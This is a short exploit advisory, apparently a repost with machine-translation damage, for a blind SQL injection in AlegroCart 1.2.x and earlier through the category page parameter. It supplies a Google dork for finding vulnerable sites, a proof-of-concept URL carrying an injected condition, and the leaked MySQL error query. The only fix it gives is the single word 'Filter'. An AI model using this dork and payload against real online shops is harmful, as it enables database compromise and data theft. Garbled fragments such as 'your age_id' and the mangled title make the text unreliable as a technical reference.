AlegroCart & amp; lt; = 1.2.x (category_next) Blind injection defect and repair

 
# Title: AlegroCart <= 1.2.x (category_next) Blind SQL Injection Vulnerability
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Web Site: www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Blind SQL Inj3cTi0n in category next page
# Tested on: [Windows XP sp3 FR] & [Linux. (Ubuntu 10.10) En] & [Mac OS x 10.6.1] & [BSDi-BSD/OS 4.2]
###
# XXx <Greetings to indoushka at the Jail... and to his mother Rebbi Ya3tik eSber> xXx
###

# Go0gle D0rk: "Powered by AlegroCart"

#(!) Vulnerability Details:

Attacker can alter queries to the application SQL database, execute arbitrary queries to the database,
Compromise the application, access or modify sensitive data, or exploit varous vulnerabilities in the underlying SQL database.

# (+) Exploit:

/? Controller = category & path = [Cat] & page = [Blind-SQLi]

PoC:

Http://www.bkjia.com /? Controller = category & path = Route 8 & page =-2 + AND + 31337 = 0

 

Fixed: Filter

# (*) Proof Of Concept Result:
-------------------
Error No: 1064
Select * from product p left join product_description pd on (p. product_id = pd. product_id)
Left join product_to_category p2c on (p. product_id = p2c. product_id) left join image I on (p. image_id = I. image_id)
Where status = 1 and your age_id = 1 and p2c. category_id = 8 and p. date_available <now () and p. status = 1 order by p. sort_order,
Pd. name asc limit-9, 3
-------------------

#(!) Result Details:

Your Can Seeing all MySQL line Command to Show Next page!

# (^_^ )! Good Luck ALL...